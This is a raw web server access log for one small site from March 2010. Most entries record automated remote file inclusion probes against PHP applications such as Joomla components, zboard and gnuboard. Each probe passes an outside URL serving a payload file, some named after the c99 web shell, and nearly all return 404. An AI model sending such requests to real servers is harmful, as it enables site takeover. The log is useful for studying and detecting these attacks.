78.153.202.207 - - [06/Mar/2010:11:56:54 -0800] "GET /logs/access.log%20%20/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
78.153.202.207 - - [06/Mar/2010:11:56:54 -0800] "GET /logs/access.log%20%20/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
78.153.202.207 - - [06/Mar/2010:11:56:54 -0800] "GET /logs/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
78.153.202.207 - - [06/Mar/2010:11:56:54 -0800] "GET /components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
78.153.202.207 - - [06/Mar/2010:11:56:56 -0800] "GET /components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
78.153.202.207 - - [06/Mar/2010:11:56:56 -0800] "GET /logs/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
78.153.202.207 - - [06/Mar/2010:11:56:56 -0800] "GET /logs/access.log%20%20/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
64.15.158.246 - - [06/Mar/2010:11:57:33 -0800] "GET /logs/access.log/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:12:06:12 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:12:06:12 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:12:06:12 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:12:07:26 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:12:07:26 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:12:07:26 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:12:11:22 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.46.204.193 - - [06/Mar/2010:12:14:17 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:15:47 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:15:47 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:15:50 -0800] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:17:00 -0800] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:17:00 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:17:02 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:17:49 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:17:49 -0800] "GET /logs/access_100227.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:17:49 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.46.204.193 - - [06/Mar/2010:12:18:15 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:19:05 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:19:07 -0800] "GET /logs/access_100227.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:19:07 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:12:23:37 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:12:23:37 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:12:23:37 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
115.72.148.167 - - [06/Mar/2010:12:26:39 -0800] "GET / HTTP/1.1" 200 915 "http://diet.freeglutenallergy.info/" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 4.0)" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:28:18 -0800] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:28:18 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:28:22 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.157.211.204 - - [06/Mar/2010:12:30:30 -0800] "GET /logs/access_100227.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:33:22 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:33:22 -0800] "GET /logs/access.log///registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:33:22 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:33:23 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:33:23 -0800] "GET /logs/access.log///registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:33:23 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:37:58 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:37:58 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:37:59 -0800] "GET /logs/access.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:38:46 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:38:46 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:12:38:48 -0800] "GET /logs/access.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.111.160 - - [06/Mar/2010:12:39:12 -0800] "GET /logs/?S=D HTTP/1.0" 200 1065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:44:07 -0800] "GET /zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:44:07 -0800] "GET /logs//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:44:07 -0800] "GET /logs/access_100220.log//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:44:09 -0800] "GET /zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:44:09 -0800] "GET /logs//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:44:09 -0800] "GET /logs/access_100220.log//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:44:19 -0800] "GET /logs///delete_comment.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:44:19 -0800] "GET /logs/access_100220.log%20%20///delete_comment.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:44:20 -0800] "GET //delete_comment.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:44:47 -0800] "GET /logs///delete_comment.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:44:50 -0800] "GET //delete_comment.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:44:50 -0800] "GET /logs/access_100220.log%20%20///delete_comment.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:45:21 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:45:22 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:45:22 -0800] "GET /logs/access_100227.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:47:37 -0800] "GET /logs/access.log%20%20//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:47:37 -0800] "GET /zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:47:37 -0800] "GET /logs//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:48:14 -0800] "GET /logs//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:48:14 -0800] "GET /logs/access.log//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:48:14 -0800] "GET /zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:48:27 -0800] "GET /zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:48:28 -0800] "GET /logs//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:48:28 -0800] "GET /logs/access.log//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
208.80.193.28 - - [06/Mar/2010:12:49:01 -0800] "GET / HTTP/1.0" 200 899 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; (R1 1.5); .NET CLR 1.1.4322)" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:49:16 -0800] "GET /zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:49:16 -0800] "GET /logs//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:12:49:16 -0800] "GET /logs/access.log%20%20//zboard/skin/zero_vote/setup.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:49:35 -0800] "GET /logs/access.log%20%20///delete_comment.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.205.50.6 - - [06/Mar/2010:12:51:11 -0800] "GET /logs/?sourcedir=http://fluffylabs.com/i1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.205.50.6 - - [06/Mar/2010:12:51:12 -0800] "GET /?sourcedir=http://fluffylabs.com/i1.txt?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.205.50.6 - - [06/Mar/2010:12:51:12 -0800] "GET /logs/access.log/?sourcedir=http://fluffylabs.com/i1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:51:52 -0800] "GET /logs/access_100220.log%20%20///delete_comment.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:51:54 -0800] "GET //delete_comment.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:51:55 -0800] "GET /logs///delete_comment.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:12:56:23 -0800] "GET /logs/access.log%20%20///delete_comment.php?board_skin_path=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.17 - - [06/Mar/2010:12:58:13 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.17 - - [06/Mar/2010:12:58:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.17 - - [06/Mar/2010:12:58:13 -0800] "GET /skin/zero_vote/error.php?dir=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.150.205.156 - - [06/Mar/2010:12:59:20 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "www.getyourselfahorse.com"
219.150.205.156 - - [06/Mar/2010:12:59:20 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "www.getyourselfahorse.com"
219.150.205.155 - - [06/Mar/2010:12:59:20 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "www.getyourselfahorse.com"
41.204.218.244 - - [06/Mar/2010:13:04:44 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
41.204.218.244 - - [06/Mar/2010:13:04:44 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
41.204.218.244 - - [06/Mar/2010:13:04:44 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.71.214.230 - - [06/Mar/2010:13:09:34 -0800] "GET /logs/access_100220.log//login.php?dir=http://p0stales-s0nico.com/c99.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.getyourselfahorse.com"
199.71.214.230 - - [06/Mar/2010:13:09:35 -0800] "GET /login.php?dir=http://p0stales-s0nico.com/c99.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.getyourselfahorse.com"
199.71.214.230 - - [06/Mar/2010:13:09:35 -0800] "GET /logs//login.php?dir=http://p0stales-s0nico.com/c99.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:13:13:00 -0800] "GET /gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:13:13:00 -0800] "GET /logs/gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:13:13:00 -0800] "GET /logs/access_100220.log%20%20/gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:13:13:23 -0800] "GET /logs/access.log%20%20/gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.17 - - [06/Mar/2010:13:14:53 -0800] "GET /skin/zero_vote/error.php?dir=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.17 - - [06/Mar/2010:13:15:08 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.17 - - [06/Mar/2010:13:15:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.71.214.230 - - [06/Mar/2010:13:22:33 -0800] "GET /logs/access.log//login.php?dir=http://p0stales-s0nico.com/c99.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "getyourselfahorse.com"
199.71.214.230 - - [06/Mar/2010:13:22:33 -0800] "GET /login.php?dir=http://p0stales-s0nico.com/c99.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "getyourselfahorse.com"
199.71.214.230 - - [06/Mar/2010:13:22:33 -0800] "GET /logs//login.php?dir=http://p0stales-s0nico.com/c99.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "getyourselfahorse.com"
221.143.42.249 - - [06/Mar/2010:13:24:43 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
67.195.112.187 - - [06/Mar/2010:13:25:59 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
